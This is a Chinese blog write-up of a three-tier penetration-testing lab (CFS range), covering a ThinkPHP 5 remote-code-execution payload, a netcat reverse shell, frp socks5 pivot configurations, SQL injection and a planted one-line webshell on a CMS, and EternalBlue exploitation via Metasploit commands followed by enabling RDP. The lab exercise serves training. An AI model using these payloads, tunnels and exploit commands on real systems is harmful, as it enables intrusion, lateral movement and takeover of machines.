CFS三层靶机

admin 2020年10月9日23:37:37评论443 views字数 3161阅读10分32秒阅读模式

网络拓扑

CFS三层靶机

IP地址规划

攻击网段 192.168.1.0


网段1服务器:192.168.1.0/24

            192.168.22.0/24

      

网段2服务器:192.168.22.0/24

            192.168.33.0/24

           

网段3服务器:192.168.33.0/24

VM虚拟网站配置的话需要配置三张网卡,这里通外网的我设置为了桥接,网段2就是VM2网段3就是VM3

CFS三层靶机

接着进入到宝塔里面修改网站的配置,http://192.168.1.104:8888/a768f109/ 为宝塔的入口,账号:eaj3yhsl 密码:41bb8fee

CFS三层靶机

接着修改运行目录为二级目录中的public

CFS三层靶机

接着访问到WEB服务器的80端口,大大的ThinkPHP V5映入眼帘!

CFS三层靶机

对网站的目录进行扫描,这里扫描除了有robots.txt文件,访问这个文件获取到了第一个flag!

CFS三层靶机

CFS三层靶机

使其报错,发现它的版本是可能存在远程命令执行的版本!等下可以试一下POC打过去

CFS三层靶机

使用POC打过去发现是存在远程命令执行,这里显示出了PHP版本为7版本

URL:http://192.168.1.104//index.php?s=captcha

POST_DATA:_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

CFS三层靶机

接着在public目录下找到了flag!

CFS三层靶机

接着使用whereis来查看有拿下可以反弹shell的命令,这里有nc bash python exec php

CFS三层靶机

然后使用nc来反弹一个shell过来,反弹过来的shell是www的权限!然后使用Python获取一个shell外壳

CFS三层靶机

接着ctrl + z 回到原来的shell中,接着输入stty raw -echo 之后再输入fg 获取一个有补全命令和防止端口的shell!

CFS三层靶机

查看网卡信息,发现WEB服务器是双网卡的服务器,还有一张网卡通向192.168.22.0/24网段
CFS三层靶机

接着可以进行内网代理,然后进入到内网进行下一步的渗透!这里使用frp来进行socks5代理进入内网!
首先按照相应的版本下载frp的文件

https://github.com/fatedier/frp/releases

首先配置服务端的配置文件frps.ini

[common]

bind_addr = 0.0.0.0

bind_port = 7000


dashboard_port = 7500

# 用户密码需要配置强密码

dashboard_user = admin_admin

dashboard_pwd = admin_admin


# 允许客户端绑定的端口

allow_ports = 40000-50000

然后输入命令开启frps服务器的监听。

# 启动  nohup ./frps -c frps.ini &

CFS三层靶机

接着配置客户端的frpc.ini配置文件。这里是配置它的socks5的代理。所以配置文件里面需要加socks5。然后 ./frpc -c frpc.ini 启动连接

[common]

# 远程VPS地址

server_addr = 192.168.1.107

server_port = 7000

tls_enable = true

pool_count = 5


[plugin_socks]

type = tcp

remote_port = 46075

plugin = socks5

plugin_user = admin_admin

plugin_passwd = admin_admin

use_encryption = true

use_compression = true

连接之后可以再web管理页面查看到已经后socks5的代理隧道已经建立完成!

CFS三层靶机

接着使用Proxifier 工具进行代理,IP就是192.168.1.107端口就是40075,需要加上账号和密码!接着使用nmap对这个IP进行扫描,发现开启了80端口和8888端口。8888端口就是宝塔的端口!

CFS三层靶机

接着访问80端口,发现是一个使用八哥CMS搭建的网站!

CFS三层靶机

接着再robots.txt这个文件中找到了网站后台的登陆地址!

CFS三层靶机

最骚的就是再网页源码这里发现了一个HTML注释写着有注入漏洞,是不是程序员为了报复老板啊!

CFS三层靶机

果然就是报复老板吧!这里的确有SQL注入漏洞!这里直接爆出它的后台密码出来!

CFS三层靶机

CFS三层靶机

直接进入到后台,进来之后再备忘录之里找到了flag!

CFS三层靶机

接着到site/index.php这个php文件中插入一句话木马进去!获取webshell

CFS三层靶机

接着再蚁剑这里设置代理,然后把webshell添加到蚁剑

CFS三层靶机

然后再192.168.22.129这台主机的网站upload目录下找到了flag!

CFS三层靶机

切换到192.168.22.129这台主机的根目录,发现了这台主机的第三个flag!

CFS三层靶机

查看这台主机的IP地址,发现这台主机也是双网卡的主机,另一张网卡通向192.168.33.0/24网段

CFS三层靶机

接着上传frps到192.168.1.104这台WEB机器上面,并且监听7000端口!

CFS三层靶机

然后把frpc和frpc.ini上传到192.168.22.129这台再网段2的机器上面!配置如下

[common]

server_addr = 192.168.22.128

server_port = 7000


[plugin_socks5_2]

type = tcp

remote_port = 46076

plugin = socks5

CFS三层靶机

接着再网段 1 IP地址192.168.1.104这台WEB机器上面修改frp配置,添加本地端口转发。
这个本地端口转发的意思就是将网段2 的流量都转到本地的46077这个端口上面,由于46076这个端口是网段2 frp客户端连接过来的端口,那么就可以通过这个端口访问到网段2可以访问的网段3了!

[common]

# 远程VPS地址

server_addr = 192.168.1.107

server_port = 7000

tls_enable = true

pool_count = 5



[plugin_socks]

type = tcp

remote_port = 46075

plugin = socks5

plugin_user = admin_admin

plugin_passwd = admin_admin

use_encryption = true

use_compression = true


[proxy_to_network33]

type = tcp

local_ip = 127.0.0.1

local_port = 46076

remote_port = 46077

配置好了之后可以在WEB管理页面上面看到多了一个本地转发的端口!

CFS三层靶机

接着使用代理测试一下,这里代理的端口就是46077这个可以访问网段3的端口。然后再通过这个端口端口就可以访问得到网段3的机器了!

CFS三层靶机

这样的话就已经可以访问到网段3 了。通过对该网段的扫描发现该网段存活192.168.33.33这台主机,接着对其进行端口扫描发现开启了445端口。

CFS三层靶机

对其进行永恒之蓝的扫描发现存在漏洞,直接刚一波永恒之蓝过去发现成功的获取了shell!并且获取了这台机器的账号密码

use exploit/windows/smb/ms17_010_eternalblue

set rhosts 192.168.33.33

set payload windows/x64/meterpreter/bind_tcp

run

CFS三层靶机

使用如下命令开启3389端口,接着使用账号密码登陆进去这台网段3的机器!
run post/windows/manage/enable_rdp

proxychains rdesktop -u administrator -p teamssix.com 192.168.33.33

CFS三层靶机

渗透测试 红队攻防 免杀 权限维持 等等技术 

及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

进来一起学习吧

CFS三层靶机






本文始发于微信公众号(黑白天):CFS三层靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月9日23:37:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CFS三层靶机https://cn-sec.com/archives/153382.html

发表评论

匿名网友 填写信息